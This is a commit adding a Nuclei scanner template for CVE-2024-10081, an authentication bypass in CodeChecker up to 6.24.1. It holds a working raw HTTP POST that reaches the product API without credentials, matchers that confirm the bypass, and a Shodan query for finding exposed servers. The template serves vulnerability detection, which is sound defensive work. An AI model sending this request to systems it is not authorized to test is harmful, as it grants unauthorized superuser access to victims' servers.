Merge pull request #11186 from projectdiscovery/CVE-2024-10081

Create CVE-2024-10081.yaml (CodeChecker <= 6.24.1 Authentication Bypass)
2024-11-12 18:52:13 +05:30 · 2024-11-12 18:52:13 +05:30 · db9c0c8e0b
parent ac401ac821 f9a59aa6eb
commit db9c0c8e0b
1 changed files with 40 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-10081.yaml
+++ b/http/cves/2024/CVE-2024-10081.yaml
@ -0,0 +1,40 @@
+id: CVE-2024-10081
+
+info:
+  name: CodeChecker <= 6.24.1 - Authentication Bypass
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
+  reference:
+    - https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
+    - https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-10081
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10
+    cve-id: CVE-2024-10081
+    cwe-id: CWE-288
+    epss-score: 0.00043
+    epss-percentile: 0.09989
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.favicon.hash:-1496590341
+  tags: cve,cve2024,code-checker,auth-bypass
+
+http:
+  - raw:
+      - |
+        POST /v6.58/Products/Authentication HTTP/1.1
+        Host: {{Hostname}}
+
+        [1,"getProducts",1,1,{}]
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"{\"0\":{\"lst\":[\"rec\",")'
+          - "!contains(body,'Error code 401: Unauthorized')"
+          - "contains(header,'application/x-thrift')"
+        condition: and